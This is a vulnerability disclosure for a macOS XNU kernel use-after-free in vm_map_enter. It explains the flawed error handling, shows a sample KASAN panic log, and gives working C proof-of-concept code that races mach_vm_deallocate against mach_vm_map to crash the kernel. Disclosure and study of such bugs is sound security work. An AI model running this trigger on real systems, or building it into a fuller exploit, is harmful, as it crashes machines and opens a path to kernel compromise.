// @i41nbeer
#if 0
XNU vm_object use-after-free due to invalid error handling in vm_map_enter

vm_map_enter allocates and inserts a vm_map_entry into a vm_map.

A vm_object pointer is passed in, and if it's non-null then the ownership semantics
imply that a reference is moved with the pointer. Upon a successful mapping that reference
is moved into the vm_entry.

If vm_map_enter fails for some reason then the expected semantics are that
the passed-in reference isn't consumed and the called retains that reference.

vm_map_enter takes the map lock then inserts a new vm_map_entry into the map.

It then reaches this code:

	new_mapping_established = TRUE;

BailOut:
	assert(map_locked == TRUE);

	/*
	 * Address space limit enforcement (RLIMIT_AS and RLIMIT_DATA):
	 * If we have identified and possibly established the new mapping(s),
	 * make sure we did not go beyond the address space limit.
	 */
	if (result == KERN_SUCCESS) {
		if (map->size_limit != RLIM_INFINITY &&
		    map->size > map->size_limit) {
			/*
			 * Establishing the requested mappings would exceed
			 * the process's RLIMIT_AS limit: fail with
			 * KERN_NO_SPACE.
			 */
			result = KERN_NO_SPACE;

*After* the vm_map_entry has been added to the vm_map they perform two rlimit checks
(against size_limit and data_limit) and if either of those fail they set result to
KERN_NO_SPACE.

They then unlock the map:

	if (!keep_map_locked) {
		vm_map_unlock(map);
		map_locked = FALSE;
	}

(keep_map_locked is indirectly controllable; and it will be false in this PoC)

Then the code does this:

	if (result != KERN_SUCCESS) {
		if (new_mapping_established) {
			/*
			 * The caller had an extra reference on the VM object
			 * it gave us.
			 * We've transferred that reference to the mapping we
			 * just established but we're about to undo that mapping
			 * and release that reference.
			 * The caller expects its reference to be consumed on
			 * success only, so we have to get the extra reference
			 * back for the caller.
			 */
			vm_object_reference(caller_object);

Right at the top of vm_map_enter they make a copy of the object pointer passed in:

	caller_object = object;

The comment explains the vulnerability quite clearly. They have transferred the passed-in
reference to the mapping they just established. The thing the comment doesn't mention is
that they also *unlocked the map* meaning that that reference could be gone if the reference
passed in was the only one keeping the object alive.

There are places where that is the case (like here where a copy-object is being directly allocated
then the only reference being moved into vm_map_enter.)

By racing a thread to deallocate the vm_map_entry while the map is unlocked we can trigger
a use-after-free.

The callsite of vm_map_enter will call vm_object_deallocate on the dangling pointer as well.

I believe the bug would be quite exploitable; the only trick required would be to ensure that
vm_object_reference is called while the dangling pointer refers to an object which is
currently in the final stages of being destructed such that it has no effect and you instead
get the more exploitable primitive of a call to vm_object_deallocate on a dangling (but in-use)
vm_object_pointer. From a cursory glance at the code I think this is possible; but this PoC just
triggers a KASAN crash demonstrating the use-after-free.

Tested on MacOS 12.5 (21G72) on 2019 13-inch MacBook Pro (Intel machine!)

Important: you should really use KASAN to see the bug clearly. Here's a sample KASAN panic:

 panic(cpu 2 caller 0xffffff8020a641c3): KASan: invalid 2-byte load from 0xffffff80435d650a [HEAP_FREED]
 Shadow             0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f
 fffff7f0086bac50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 fffff7f0086bac60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 fffff7f0086bac70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 fffff7f0086bac80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 fffff7f0086bac90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 fffff7f0086baca0: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd 
 fffff7f0086bacb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 
 fffff7f0086bacc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 fffff7f0086bacd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 fffff7f0086bace0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 fffff7f0086bacf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

 @kasan-report.c:114
Panicked task 0xffffff86b99a9340: 2 threads: pid 547: fill_up
Backtrace (CPU 2), panicked thread: 0xffffff86bd7be010, Frame : Return Address
0xffffffb0c3ccea60 : 0xffffff801f17ad64 
0xffffffb0c3cceab0 : 0xffffff801f579954 
0xffffffb0c3cceaf0 : 0xffffff801f56326a 
0xffffffb0c3cceb80 : 0xffffff801f581d10 
0xffffffb0c3cceba0 : 0xffffff801f17a640 
0xffffffb0c3ccecd0 : 0xffffff801f17b410 
0xffffffb0c3cced40 : 0xffffff8020a41315 
0xffffffb0c3ccee30 : 0xffffff8020a641c3 
0xffffffb0c3ccee40 : 0xffffff8020a381e7 
0xffffffb0c3cceec0 : 0xffffff8020a37cbd 
0xffffffb0c3cceef0 : 0xffffff8020a382b5 
0xffffffb0c3ccef00 : 0xffffff801f1ccc99 
0xffffffb0c3ccef40 : 0xffffff801f41b74f 
0xffffffb0c3ccef70 : 0xffffff801f3a1405 
0xffffffb0c3ccf490 : 0xffffff801f3a6b86 
0xffffffb0c3ccf820 : 0xffffff801f39a2f7 
0xffffffb0c3ccf8b0 : 0xffffff801f4a6c04 
0xffffffb0c3ccf9e0 : 0xffffff801f2c218a 
0xffffffb0c3ccfa70 : 0xffffff801f18a5f8 
0xffffffb0c3ccfb90 : 0xffffff801f115ea0 
0xffffffb0c3ccfc90 : 0xffffff801f151bb1 
0xffffffb0c3ccfe30 : 0xffffff801f52433d 
0xffffffb0c3ccffa0 : 0xffffff801f5824f6 

Process name corresponding to current thread (0xffffff86bd7be010): fill_up
Boot args: kcsuffix=kasan

Mac OS version:
21G72

Kernel version:
Darwin Kernel Version 21.6.0: Sat Jun 18 17:06:38 PDT 2022; root:xnu_kasan-8020.140.41~1/KASAN_X86_64
Kernel UUID: 2A65FF75-CAA1-35CD-9B8C-1E74F794BBCC
KernelCache slide: 0x000000001ee00000
KernelCache base:  0xffffff801f000000
Kernel slide:      0x000000001ee10000
Kernel text base:  0xffffff801f010000
__HIB  text base: 0xffffff801ef00000
System model name: MacBookPro15,2 (Mac-827FB448E656EC26)
System shutdown begun: NO
Hibernation exit count: 0
#endif

#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <sys/resource.h>
#include <pthread.h>

size_t a_big_size = 0x1000000000ULL;

mach_vm_address_t fixed_address = 0x4100000000ULL;

void* deallocator(void* arg) {
  printf("deallocator running\n");
  while(1) {
    mach_vm_deallocate(mach_task_self(), fixed_address, a_big_size);
  }
}

int main(int argv, char** argc) {
  kern_return_t merr;

  // make a memory object
  mach_port_t named_port = MACH_PORT_NULL;
  merr = mach_memory_object_memory_entry_64(
                        mach_host_self(),
                        1,
                        a_big_size,
                        VM_PROT_READ | VM_PROT_WRITE,
                        MACH_PORT_NULL,
                        &named_port);

  if (merr != KERN_SUCCESS) {
    printf("failed to allocate memory object\n");
    return 0;
  }

  // spin up a thread deallocating at a fixed address
  pthread_t th;
  pthread_create(&th, NULL, deallocator, NULL);

  // set an rlimit so the mapping will fail
  struct rlimit old_lim = {0};
  int err = getrlimit(RLIMIT_DATA, &old_lim);

  if (err != 0) {
    printf("getrlimit failed: %x\n", err);
    return 0;
  }

  printf("old rlim_cur : 0x%llx\n", old_lim.rlim_cur);
  printf("old rlim_max : 0x%llx\n", old_lim.rlim_max);

  struct rlimit new_lim = {0};

  new_lim.rlim_cur = a_big_size;
  new_lim.rlim_max = a_big_size;

  err = setrlimit(RLIMIT_DATA, &new_lim);

  if (err != 0) {
    printf("setrlimit failed: %x\n", err);
    return 0;
  }

  // in a loop, try to map a copy of the memory object:
  while (1) {
      mach_vm_address_t obj_addr = fixed_address;
      merr = mach_vm_map(mach_task_self(),
                     &obj_addr,
                     a_big_size,
                     0, // mask
                     VM_FLAGS_FIXED,
                     named_port,
                     0,
                     1, // copy
                     VM_PROT_READ | VM_PROT_WRITE,
                     VM_PROT_READ | VM_PROT_WRITE,
                     VM_INHERIT_NONE); // inheritance
  }

  return 0;
}
